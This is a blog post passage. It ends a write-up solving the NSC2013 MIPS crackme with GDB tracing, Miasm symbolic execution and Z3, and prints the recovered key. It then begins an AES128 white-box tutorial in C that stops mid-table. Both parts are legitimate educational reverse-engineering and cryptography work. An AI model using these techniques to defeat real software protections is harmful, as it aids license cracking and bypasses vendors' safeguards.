As Axel has previously explained, the first step is to recover the child's execution flow. Because of nanomites, the child is driven by the parent; we have to analyze the parent (i.e. the debug function) first to determine the correct sequence of the child's pc values.

The parent's main loop is obfuscated, but by browsing cross-references of stack variables in IDA, we can see where each one is used. After a bit of analysis, we can try to decompile by hand the algorithm, and write a pseudo-Python code description of what the debug function does (it is really simplified):

counter = 0
waitpid()

while(True):
    regs = ptrace(GETREGS)

    # big block 1
    addr = regs.pc
    param = f(counter)
    addr = obfu1(addr, param)

    for i in range(605):
        entry = pcs[i]  # entry is 8 bytes long (2 dwords)
        if(addr == entry.first_dword):
            addr = entry.second_dword
            break

    # big block 2
    addr = obfu2(addr, param)

    regs.pc = addr
    ptrace(SETREGS, regs)
    counter += 1

    if(not waitpid()):
        break

The "big blocks" are the two long assembly blocks preceding and following the inner loop. Without looking at the gory details, we understand that a param value is derived from the counter using a function that I call f, and then used to obfuscate the original child's pc. The result is then searched in a pcs array (stored at address 0414130), the next dword is extracted and used in a 2nd obfuscation pass to finally produce the new pc value injected into the child.

The most important fact here is that that this process does not involve the input key at anytime. The output pc sequence is deterministic and constant; two executions with two different keys will produce the same sequence of pc's. Since we know the first value of pc (the first break instruction at 040228C), we can theoretically compute the correct sequence and then reorder the child's instructions according to this sequence.

We have two approaches for doing so:

  • statical analysis: somehow understand each instruction used in obfuscation passes and rewrite the algorithm producing the correct sequence. This is the path followed by Axel.
  • dynamic analysis: trace the program once and log all pc values.

Although the first one is probably the most interesting, the second is certainly the fastest. Again, it only works because the input key does not influence the output pc sequence. And we're lucky: the child is already debugged by the parent, but nothing prevents us to debug the parent itself.

First attempt at tracing

Tracing is pretty straightforward with GDB using bp and commands. In order to understand the parent's algorithm a bit better, I first wrote a pretty verbose GDB script that prints the loop counter, param variable as well as the original and new child's pc for each iteration. I chose to put two breakpoints:

  • The first one at the end of the first obfuscation blocks (0x401440)
  • The second one before the ptrace call at the end of the second block (0x0401D8C), in order to be able to read the child's pc manipulated by the parent.

Here is the script:

##################################
# A few handy functions
##################################

def print_context_pc
    printf "regs.pc = 0x%08x\n", *(int*)($fp-0x1cc)
end

def print_param
    printf "param = 0x%08x\n", *(int*)($fp-0x2f0)
end

def print_addr
    printf "addr = 0x%08x\n", *(int*)($fp-0x2fc)
end

def print_counter
    printf "counter = %d\n", *(int*)($fp-0x300)
end

##################################

set pagination off
set confirm off
file crackmips
target remote 127.0.0.1:4444 # gdbserver address

# break at the end of block 1
b *0x401440
commands
silent
printf "\nNew round\n"
print_counter
print_context_pc
print_param 
print_addr
c
end

# break before the end of block 2
b *0x0401D8C
commands
silent
print_context_pc
c
end

c

To run that script within GDB, we first need to start crackmips with gdbserver in our qemu VM. After a few minutes, we get the following (cleaned) trace:

New round
counter = 0
regs.pc = 0x0040228c
param = 0x00000000
addr = 0xcd0e9f0e
regs.pc = 0x00402290

New round
counter = 1
regs.pc = 0x004022bc
param = 0x00000000
addr = 0xcd0e99ae
regs.pc = 0x00402ce0

New round
counter = 2
regs.pc = 0x00402d0c
param = 0x00000000
addr = 0xcd0e420e
regs.pc = 0x00402da8

[...]

By reading the trace further, we realize that param is always equal to counter/101. This is actually the child's own loop counter, since its big loop is made of 101 pseudo basic blocks. We also notice that the pc sequence is different for each child's loop: round 0 is not equal to round 101, etc.

Getting a clean trace

Since we're only interested in the final pc value for each round, we can make a simpler script that just outputs those values. And organize them in a parsable format to be able to use them later in another script. Here is the version 2 of the script:

def print_context_pc
    printf "0x%08x\n", *(int*)($fp-0x1cc)
end

set pagination off
set confirm off
file crackmips
target remote 127.0.0.1:4444

# break before the end of block 2
b *0x0401D8C
commands
silent
print_context_pc
c
end

c

The cleaned trace only contains the 606 pc values, one on each line:

0x00402290
0x00402ce0
0x00402da8
0x00403550
[...]
0x004030e4
0x004039dc

Mission 1: accomplished!

Shortcut #2 : Symbolic execution using Miasm

We now have the list of each start address of each basic block executed by the child. The next step is to understand what each one of them does, and reorder them to reproduce the whole algorithm.

Even though writing a symbolic execution engine from scratch is certainly a fun and interesting exercise, I chose to play with Miasm. This excellent framework can disassemble binaries in various architectures (among which x86, x64, ARM, MIPS, etc.), and convert them into an intermediate language called IR (intermediate representation). It is then able to perform symbolic execution on this IR in order to find what are the side effects of a basic block on registers and memory locations. Although there is not so much documentation, Miasm contains various examples that should make the API easier to dig in. Don't tell me that it is hard to install, it is really not (well, I haven't tried on Windows ;). And there is even a docker image, so you have no excuse to not try it!

Miasm symbolic execution 101

Before scripting everything, let's first see how to use Miasm to perform symbolic execution of one basic block. For the sake of simplicity, let's work on the first basic block of the child's main loop.

from miasm2.analysis.machine import Machine
from miasm2.analysis import binary

bi = binary.Container("crackmips")
machine = Machine('mips32l')
mn, dis_engine_cls, ira_cls = machine.mn, machine.dis_engine, machine.ira

First, we open the crackme using the generic Container class. It automatically detects the executable format and uses Elfesteem to parse it. Then we use the handy Machine class to get references to useful classes we'll use to disassemble and analyze the binary.

BB_BEGIN = 0x00402290
BB_END = 0x004022BC

# Disassemble between BB_BEGIN and BB_END
dis_engine = dis_engine_cls(bs=bi.bs)
dis_engine.dont_dis = [BB_END]
bloc = dis_engine.dis_bloc(BB_BEGIN)
print '\n'.join(map(str, bloc.lines))

Here, we disassemble a single basic block, by explicitly telling Miasm its start and end address. The disassembler is created by instantiating the dis_engine_cls class. bi.bs represents the binary stream we are working on. I admit the dont_dis syntax is a bit weird; it is used to tell Miasm to stop disassembling when it reaches a given address. We do it here because the next instruction is a break, and Miasm does not normally think it is the end of a basic block. When you run those lines, you should get this output:

LW         V1, 0x38(FP)
SLL        V0, V1, 0x2
ADDIU      A0, FP, 0x18
ADDU       V0, A0, V0
LW         A0, 0x8(V0)
LW         V0, 0x38(FP)
SUBU       A0, A0, V0
SLL        V0, V1, 0x2
ADDIU      V1, FP, 0x18
ADDU       V0, V1, V0
SW         A0, 0x8(V0)

Okay, so we know how to disassemble a block with Miasm. Let's now see how to convert it into the Intermediate Representation:

# Transform to IR
ira = ira_cls()
irabloc = ira.add_bloc(bloc)[0]
print '\n'.join(map(lambda b: str(b[0]), irabloc.irs))

We instantiated the ira_cls class and called its add_bloc method. It takes a basic block as input and outputs a list of IR basic blocs; here we know that we'll get only one, so we use [0]. Let's see what is the output of those lines:

V1 = @32[(FP+0x38)]
V0 = (V1 << 0x2)
A0 = (FP+0x18)
V0 = (A0+V0)
A0 = @32[(V0+0x8)]
V0 = @32[(FP+0x38)]
A0 = (A0+(- V0))
V0 = (V1 << 0x2)
V1 = (FP+0x18)
V0 = (V1+V0)
@32[(V0+0x8)] = A0
IRDst = loc_00000000004022BC:0x004022bc

Each one of those lines are instructions in Miasm's IR language. It is pretty easy: each instruction is described as a list of side-effects it has on some variables, using expressions and affectations. @32[...] represents a 32-bit memory access; when it's on the left of an = sign, it's a write access, when it's on the right it's a read. The last line uses the pseudo-register IRDst, which is kind of the IR's pc register. It tells Miasm where is located the next basic block.

Great! Let's see now how to perform symbolic execution on this IR basic block.

from miasm2.expression.expression import *
from miasm2.ir.symbexec import symbexec
from miasm2.expression.simplifications import expr_simp

# Prepare symbolic execution
symbols_init = {}
for i, r in enumerate(mn.regs.all_regs_ids):
    symbols_init[r] = mn.regs.all_regs_ids_init[i]

# Perform symbolic exec
sb = symbexec(ira, symbols_init)
sb.emulbloc(irabloc)

mem, exprs = sb.symbols.symbols_mem.items()[0]
print "Memory changed at %s :" % mem
print "\tbefore:", exprs[0]
print "\tafter:", exprs[1]

The first lines are initializing the symbol pool used for symbolic execution. We then use the symbexec module to create an execution engine, and we give it our fresh IR basic block. The result of the execution is readable by browsing the attributes of sb.symbols. Here I am mainly interested on the memory side-effects, so I use symbols_mem.items() to list them. symbols_mem is actually a dict whose keys are the memory locations that changed during execution, and values are pairs containing both the previous value that was in that memory cell, and the new one. There's only one change, and here it is:

Memory changed at (FP_init+(@32[(FP_init+0x38)] << 0x2)+0x20) :
  before: @32[(FP_init+(@32[(FP_init+0x38)] << 0x2)+0x20)]
  after: (@32[(FP_init+(@32[(FP_init+0x38)] << 0x2)+0x20)]+(- @32[(FP_init+0x38)]))

The expressions are getting a bit more complex, but still pretty readable. FP_init represents the value of the fp register at the beginning of execution. We can clearly see that a memory location as modified since a value was subtracted from it. But we can do better: we can give Miasm simplification rules in order to make this output much more readable. Let's do it!

# Simplifications
fp_init = ExprId('FP_init', 32)
zero_init = ExprId('ZERO_init', 32)
e_i_pattern = expr_simp(ExprMem(fp_init + ExprInt32(0x38), 32))
e_i = ExprId('i', 32)
e_pass_i_pattern = expr_simp(ExprMem(fp_init + (e_i << ExprInt32(2)) + ExprInt32(0x20), 32))
e_pass_i = ExprId("pwd[i]", 32)

simplifications = {e_i_pattern      : e_i,
                    e_pass_i_pattern : e_pass_i,
                    zero_init        : ExprInt32(0) }

def my_simplify(expr):
    expr2 = expr.replace_expr(simplifications)
    return expr2

print "%s = %s" % (my_simplify(exprs[0]) ,my_simplify(exprs[1]))

Here we declare 3 replacement rules:

  • Replace @32[(FP_init+0x38)] with i
  • Replace @32[(FP_init+(i << 0x2)+0x20)] with pwd[i]
  • Replace ZERO_init with 0 (although it is not really useful here)

There is actually a more generic way to do it using pattern matching rules with jokers, but we don't really need this machinery here. This the result we get after simplification:

pwd[i] = (pwd[i]+(- i))

That's all! So all this basic block does is a subtraction. What is nice is that the output is actually valid Python code :). This will be very useful in the last part.

Generating the child's algorithm

So in less than 60 lines, we were able to disassemble an arbitrary basic block, perform symbolic execution on it and get a pretty understandable result. We just need to apply this logic to the 100 remaining blocks, and we'll have a pythonic version of each one of them. Then, we simply reorder them using the GDB trace we got from the previous part, and we'll be able to generate 606 python lines describing the whole algorithm.

Here is an extract of the script automating all of this:

def load_trace(filename):
    return [int(x.strip(), 16) for x in open(filename).readlines()]

def boundaries_from_trace(trace):
    bb_starts = sorted(set(trace))
    boundaries = [(bb_starts[i], bb_starts[i+1]-4) for i in range(len(bb_starts)-1)]
    boundaries.append((0x4039DC, 0x04039E8)) # last basic bloc, added by hand
    return boundaries

def exprs2str(exprs):
    return ' = '.join(str(e) for e in exprs)

trace = load_trace("gdb_trace.txt")
boundaries = boundaries_from_trace(trace)

print "# Building IR blocs & expressions for all basic blocks"
bb_exprs = []
for zone in boundaries:
    bb_exprs.append(analyse_bb(*zone))

print "# Reconstructing the whole algorithm based on GDB trace"
bb_starts = [x[0] for x in boundaries]
for bb_ea in trace:
    bb_index = bb_starts.index(bb_ea)
    #print "%x : %s" % (bb_ea, exprs2str(bb_exprs[bb_index]))
    print exprs2str(bb_exprs[bb_index])

The analyse_bb() function perform symbolic execution on a single basic block, given its start and end addresses. This is just wrapping what we've been doing so far into a function. The GDB trace is opened, parsed, and a list of basic block addresses is built from it (we cheat a little bit for the last one of the loop, by hardcoding it). Each basic block is analyzed and the resulting expressions are pushed into the bb_exprs list. Then the GDB trace is processed, by outputting the expressions corresponding to each basic block.

This is what we get:

# Building IR blocs & expressions for all basic blocks
# Reconstructing the whole algorithm based on GDB trace
pwd[i] = (pwd[i]+(- i))
pwd[i] = ((0x0|pwd[i])^0xFFFFFFFF)
pwd[i] = (pwd[i]^i)
pwd[i] = (pwd[i]^i)
pwd[i] = (pwd[i]+0x3ECA6F23)
pwd[i] = (pwd[i]+0x6EDC032)
[...]
pwd[i] = ((pwd[i] << 0x14)|(pwd[i] >> 0xC))
pwd[i] = ((pwd[i] << ((i+0x1)&0x1F))|(pwd[i] >> ((((0x0|i)^0xFFFFFFFF)+0x20)&0x1F)))
i = (i+0x1)

Solving with Z3

Okay, so now we have a Python (and even C ;) file describing the operations performed on the 6 dwords containing the input key. We could try to bruteforce it, but using a constraint solver is much more elegant and faster. I also chose Z3 because it has nice Python bindings. And since its expression syntax is mostly compatible with Python, we just need to add a few things to our generated file!

from z3 import *
import struct

solution_str = "[ Synacktiv + NSC = <3 ]"
solutions = struct.unpack("<LLLLLL", solution_str)
N = len(solutions)

# Hook Z3's `>>` so it works with our algorithm
# (logical shift instead of arithmetic one)
BitVecRef.__rshift__  = LShR

pwd = [BitVec("pwd_%d" % i, 32) for i in range(N)]
pwd_orig = [pwd[i] for i in range(N)]
i = 0

# paste here all the generated algorithm from previous part
# BEGIN ALGO
pwd[i] = (pwd[i]+(- i))
pwd[i] = ((0x0|pwd[i])^0xFFFFFFFF)
# [...]
pwd[i] = ((pwd[i] << ((i+0x1)&0x1F))|(pwd[i] >> ((((0x0|i)^0xFFFFFFFF)+0x20)&0x1F)))
i = (i+0x1)
# END ALGO

s = Solver()

for i in range(N):
    s.add(pwd[i] == solutions[i])

assert s.check() == sat

m = s.model()
sol_dw = [m[pwd_orig[i]].as_long() for i in range(N)]
key = ''.join(("%08x" % dw)[::-1].upper() for dw in sol_dw)

print "KEY = %s" % key

We've declared the valid solution, the list of 6 32-bit variables (pwd), pasted the algorithm, and ran the solver. We just need to be careful with the >> operation, since Z3 treats it as an arithmetic shift, and we want a logical one. So we replace it with a dirty hook.

The solution should come almost instantly:

$ python sample_solver.py
KEY = 322644EF941077AB1115AB575363AE87F58E6D9AFE5C62CC

Alternative solution - conclusion

I chose this solution not only to get acquainted with Miasm, but also because it required much less effort and pain :). It fits into approximately 20 lines of GDB script, and 120 of python using Miasm and Z3. You can find all of those in this folder. I hope it gave you an understandable example of symbolic execution and what you can do with it. However I strongly encourage you to dig into Miasm's code and examples if you want to really understand what's going on under the hood.

War's over, the final words

I guess this is where I thank both @elvanderb for this really cool challenge and @synacktiv for letting him write it :-). Emilien and I also hope you enjoyed the read, feel free to contact any of us if you have any remarks/questions/whatever.

Also, special thanks to @__x86 and @jonathansalwan for proofreading!

The codes/traces/tools developed in this post are all available on github here and here!

By the way, don't hesitate to contact a member of the staff if you have a cool post you would like to see here -- you too can end up in doar-e's wall of fame :-).

Spotlight on an unprotected AES128 white-box implementation

Introduction

I think it all began when I've worked on the NSC2013 crackme made by @elvanderb, long story short you had an AES128 heavily obfuscated white-box implementation to break. The thing was you could actually solve the challenge in different ways:

  1. the first one was the easiest one: you didn't need to know anything about white-box, crypto or even AES ; you could just see the function as a black-box & try to find "design flaws" in its inner-workings
  2. the elite way: this one involved to understand & recover the entire design of the white-box, then to identify design weaknesses that allows the challenger to directly attack & recover the encryption key. A really nice write-up has been recently written by @doegox, check it out, really :): Oppida/NoSuchCon challenge.

The annoying thing is that you don't have a lot of understandable available C code on the web that implement such things, nevertheless you do have quite some nice academic references ; they are a really good resource to build your own.

This post aims to present briefly, in a simple way what an AES white-box looks like, and to show how its design is important if you want to not have your encryption key extracted :). The implementation I'm going to talk about today is not my creation at all, I just followed the first part (might do another post talking about the second part? Who knows) of a really nice paper (even for non-mathematical / crypto guys like me!) written by James A. Muir.

The idea is simple: we will start from a clean AES128 encryption function in plain C, we will modify it & transform it into a white-box implementation in several steps. As usual, all the code are available on my github account; you are encourage to break & hack them!

Of course, we will use this post to briefly present what is the white-box cryptography, what are the goals & why it's kind of cool.

Before diving deep, here is the table of contents:

AES128

Introduction

All right, here we are: this part is just a reminder of how AES (with a 128 bits key) roughly works. If you know that already, feel free to go to the next level. Basically in here I just want us to build our first function: a simple block encryption. The signature of the function will be something, as you expect, like this:

void aes128_enc_base(unsigned char in[16], unsigned char out[16], unsigned char key[16])

The encryption works in eleven rounds, the first one & the last one are slightly different than the nine others ; but they all rely on four different operations. Those operations are called: AddRoundKey, SubBytes, ShiftRows, MixColumns. Each round modifies a 128 bits state with a 128 bits round-key. Those round-keys are generated from the encryption key after a key expansion (called key schedule) function. Note that the first round-key is actually the encryption key.

The first part of an AES encryption is to execute the key schedule in order to get our round-keys ; once we have them all it's just a matter of using the four different operations we saw to generate the encrypted plain-text.

I know that I quite like to see how crypto algorithms work in a visual way, if this is also your case check this SWF animation (no exploit in here, don't worry :)): Rijndael_Animation_v4_eng.swf ; else you can also read the FIPS-197 document.

Key schedule

The key schedule is like the most important part of the algorithm. As I said a bit earlier, this function is a derivation one: it takes the encryption key as input and will generate the round-keys the encryption process will use as output.

I don't really feel like explaining in detail how it works (as it is a bit tricky to explain that with words), I would rather advise you to read the FIPS document or to follow the flash animation. Here is what my key schedule looks like:

// aes key schedule
const unsigned char S_box[] = { 0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5, 0x30, 0x01, 0x67, 0x2B, 0xFE, 0xD7, 0xAB, 0x76, 0xCA, 0x82, 0xC9, 0x7D, 0xFA, 0x59, 0x47, 0xF0, 0xAD, 0xD4, 0xA2, 0xAF, 0x9C, 0xA4, 0x72, 0xC0, 0xB7, 0xFD, 0x93, 0x26, 0x36, 0x3F, 0xF7, 0xCC, 0x34, 0xA5, 0xE5, 0xF1, 0x71, 0xD8, 0x31, 0x15, 0x04, 0xC7, 0x23, 0xC3, 0x18, 0x96, 0x05, 0x9A, 0x07, 0x12, 0x80, 0xE2, 0xEB, 0x27, 0xB2, 0x75, 0x09, 0x83, 0x2C, 0x1A, 0x1B, 0x6E, 0x5A, 0xA0, 0x52, 0x3B, 0xD6, 0xB3, 0x29, 0xE3, 0x2F, 0x84, 0x53, 0xD1, 0x00, 0xED, 0x20, 0xFC, 0xB1, 0x5B, 0x6A, 0xCB, 0xBE, 0x39, 0x4A, 0x4C, 0x58, 0xCF, 0xD0, 0xEF, 0xAA, 0xFB, 0x43, 0x4D, 0x33, 0x85, 0x45, 0xF9, 0x02, 0x7F, 0x50, 0x3C, 0x9F, 0xA8, 0x51, 0xA3, 0x40, 0x8F, 0x92, 0x9D, 0x38, 0xF5, 0xBC, 0xB6, 0xDA, 0x21, 0x10, 0xFF, 0xF3, 0xD2, 0xCD, 0x0C, 0x13, 0xEC, 0x5F, 0x97, 0x44, 0x17, 0xC4, 0xA7, 0x7E, 0x3D, 0x64, 0x5D, 0x19, 0x73, 0x60, 0x81, 0x4F, 0xDC, 0x22, 0x2A, 0x90, 0x88, 0x46, 0xEE, 0xB8, 0x14, 0xDE, 0x5E, 0x0B, 0xDB, 0xE0, 0x32, 0x3A, 0x0A, 0x49, 0x06, 0x24, 0x5C, 0xC2, 0xD3, 0xAC, 0x62, 0x91, 0x95, 0xE4, 0x79, 0xE7, 0xC8, 0x37, 0x6D, 0x8D, 0xD5, 0x4E, 0xA9, 0x6C, 0x56, 0xF4, 0xEA, 0x65, 0x7A, 0xAE, 0x08, 0xBA, 0x78, 0x25, 0x2E, 0x1C, 0xA6, 0xB4, 0xC6, 0xE8, 0xDD, 0x74, 0x1F, 0x4B, 0xBD, 0x8B, 0x8A, 0x70, 0x3E, 0xB5, 0x66, 0x48, 0x03, 0xF6, 0x0E, 0x61, 0x35, 0x57, 0xB9, 0x86, 0xC1, 0x1D, 0x9E, 0xE1, 0xF8, 0x98, 0x11, 0x69, 0xD9, 0x8E, 0x94, 0x9B, 0x1E, 0x87, 0xE9, 0xCE, 0x55, 0x28, 0xDF, 0x8C, 0xA1, 0x89, 0x0D, 0xBF, 0xE6, 0x42, 0x68, 0x41, 0x99, 0x2D, 0x0F, 0xB0, 0x54, 0xBB, 0x16 };
#define DW(x) (*(unsigned int*)(x))
void aes128_enc_base(unsigned char in[16], unsigned char out[16], unsigned char key[16])
{
    unsigned int d;
    unsigned char round_keys[11][16] = { 0 };
    const unsigned char rcon[] = { 0x00, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, 0x72, 0xE4, 0xD3, 0xBD, 0x61, 0xC2, 0x9F, 0x25, 0x4A, 0x94, 0x33, 0x66, 0xCC, 0x83, 0x1D, 0x3A, 0x74, 0xE8, 0xCB, 0x8D, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, 0x72, 0xE4, 0xD3, 0xBD, 0x61, 0xC2, 0x9F, 0x25, 0x4A, 0x94, 0x33, 0x66, 0xCC, 0x83, 0x1D, 0x3A, 0x74, 0xE8, 0xCB, 0x8D, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, 0x72, 0xE4, 0xD3, 0xBD, 0x61, 0xC2, 0x9F, 0x25, 0x4A, 0x94, 0x33, 0x66, 0xCC, 0x83, 0x1D, 0x3A, 0x74, 0xE8, 0xCB, 0x8D, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, 0x72, 0xE4, 0xD3, 0xBD, 0x61, 0xC2, 0x9F, 0x25, 0x4A, 0x94, 0x33, 0x66, 0xCC, 0x83, 0x1D, 0x3A, 0x74, 0xE8, 0xCB, 0x8D, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, 0x72, 0xE4, 0xD3, 0xBD, 0x61, 0xC2, 0x9F, 0x25, 0x4A, 0x94, 0x33, 0x66, 0xCC, 0x83, 0x1D, 0x3A, 0x74, 0xE8, 0xCB, 0x8D };

    /// Key schedule -- Generate one subkey for each round
    /// http://www.formaestudio.com/rijndaelinspector/archivos/Rijndael_Animation_v4_eng.swf

    // First round-key is the actual key
    memcpy(&round_keys[0][0], key, 16);
    d = DW(&round_keys[0][12]);
    for (size_t i = 1; i < 11; ++i)
    {
        // Rotate `d` 8 bits to the right
        d = ROT(d);

        // Takes every bytes of `d` & substitute them using `S_box`
        unsigned char a1, a2, a3, a4;
        // Do not forget to xor this byte with `rcon[i]`
        a1 = S_box[(d >> 0) & 0xff] ^ rcon[i]; // a1 is the LSB
        a2 = S_box[(d >> 8) & 0xff];
        a3 = S_box[(d >> 16) & 0xff];
        a4 = S_box[(d >> 24) & 0xff];

        d = (a1 << 0) | (a2 << 8) | (a3 << 16) | (a4 << 24);

        // Now we can generate the current roundkey using the previous one
        for (size_t j = 0; j < 4; j++)
        {
            d ^= DW(&(round_keys[i - 1][j * 4]));
            *(unsigned int*)(&(round_keys[i][j * 4])) = d;
        }
    }
}

Sweet, feel free to dump the round keys and to compare them with an official test vector to convince you that this thing works. Once we have that function, we need to build the different primitives that the core encryption algorithm will use & reuse to generate the encrypted block. Some of them are like 1 line of C, really simple ; some others are a bit more twisted, but whatever.

Encryption process

Transformations

AddRoundKey

This one is a really simple one: it takes a round key (according to which round you are currently in), the state & you xor every single byte of the state with the round-key.

void AddRoundKey(unsigned char roundkey[16], unsigned char out[16])
{
    for (size_t i = 0; i < 16; ++i)
        out[i] ^= roundkey[i];
}

SubBytes

Another simple one: it takes the state as input & will substitute every byte using the forward substitution box S_box.

void SubBytes(unsigned char out[16])
{
    for (size_t i = 0; i < 16; ++i)
        out[i] = S_box[out[i]];
}

If you are interested in how the values of the S_box are computed, you should read the following blogpost AES SBox and ParisGP written by my mate @kutioo.

ShiftRows

This operation is a bit less tricky, but still is fairly straightforward. Imagine that the state is a 4x4 matrix, you just have to left rotate the second line by 1 byte, the third one by 2 bytes & finally the last one by 3 bytes. This can be done in C like this:

__forceinline void ShiftRows(unsigned char out[16])
{
    // +----+----+----+----+
    // | 00 | 04 | 08 | 12 |
    // +----+----+----+----+
    // | 01 | 05 | 09 | 13 |
    // +----+----+----+----+
    // | 02 | 06 | 10 | 14 |
    // +----+----+----+----+
    // | 03 | 07 | 11 | 15 |
    // +----+----+----+----+
    unsigned char tmp1, tmp2;

    tmp1 = out[1];
    out[1] = out[5];
    out[5] = out[9];
    out[9] = out[13];
    out[13] = tmp1;

    tmp1 = out[2];
    tmp2 = out[6];
    out[2] = out[10];
    out[6] = out[14];
    out[10] = tmp1;
    out[14] = tmp2;

    tmp1 = out[3];
    out[3] = out[15];
    out[15] = out[11];
    out[11] = out[7];
    out[7] = tmp1;
}

MixColumns

I guess this one is the less trivial one to implement & understand. But basically it is a "matrix multiplication" (in GF(2^8) though hence the double-quotes) between 4 bytes of the state (row matrix) against a fixed 4x4 matrix. That gives you 4 new state bytes, so you do that for every double-words of your state.

Now, I kind of cheated for my implementation: instead of implementing the "weird" multiplication, I figured I could use a pre-computed table instead to avoid all the hassle. Because the fixed matrix has only 3 different values (1, 2 & 3) the final table has a really small memory footprint: 3*0x100 bytes basically (if I'm being honest I even stole this table from @elvanderb's crazy white-box generator).

const unsigned char gmul[3][0x100] = {
    { 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1A, 0x1B, 0x1C, 0x1D, 0x1E, 0x1F, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2A, 0x2B, 0x2C, 0x2D, 0x2E, 0x2F, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3A, 0x3B, 0x3C, 0x3D, 0x3E, 0x3F, 0x40, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48, 0x49, 0x4A, 0x4B, 0x4C, 0x4D, 0x4E, 0x4F, 0x50, 0x51, 0x52, 0x53, 0x54, 0x55, 0x56, 0x57, 0x58, 0x59, 0x5A, 0x5B, 0x5C, 0x5D, 0x5E, 0x5F, 0x60, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x69, 0x6A, 0x6B, 0x6C, 0x6D, 0x6E, 0x6F, 0x70, 0x71, 0x72, 0x73, 0x74, 0x75, 0x76, 0x77, 0x78, 0x79, 0x7A, 0x7B, 0x7C, 0x7D, 0x7E, 0x7F, 0x80, 0x81, 0x82, 0x83, 0x84, 0x85, 0x86, 0x87, 0x88, 0x89, 0x8A, 0x8B, 0x8C, 0x8D, 0x8E, 0x8F, 0x90, 0x91, 0x92, 0x93, 0x94, 0x95, 0x96, 0x97, 0x98, 0x99, 0x9A, 0x9B, 0x9C, 0x9D, 0x9E, 0x9F, 0xA0, 0xA1, 0xA2, 0xA3, 0xA4, 0xA5, 0xA6, 0xA7, 0xA8, 0xA9, 0xAA, 0xAB, 0xAC, 0xAD, 0xAE, 0xAF, 0xB0, 0xB1, 0xB2, 0xB3, 0xB4, 0xB5, 0xB6, 0xB7, 0xB8, 0xB9, 0xBA, 0xBB, 0xBC, 0xBD, 0xBE, 0xBF, 0xC0, 0xC1, 0xC2, 0xC3, 0xC4, 0xC5, 0xC6, 0xC7, 0xC8, 0xC9, 0xCA, 0xCB, 0xCC, 0xCD, 0xCE, 0xCF, 0xD0, 0xD1, 0xD2, 0xD3, 0xD4, 0xD5, 0xD6, 0xD7, 0xD8, 0xD9, 0xDA, 0xDB, 0xDC, 0xDD, 0xDE, 0xDF, 0xE0, 0xE1, 0xE2, 0xE3, 0xE4, 0xE5, 0xE6, 0xE7, 0xE8, 0xE9, 0xEA, 0xEB, 0xEC, 0xED, 0xEE, 0xEF, 0xF0, 0xF1, 0xF2, 0xF3, 0xF4, 0xF5, 0xF6, 0xF7, 0xF8, 0xF9, 0xFA, 0xFB, 0xFC, 0xFD, 0xFE, 0xFF },
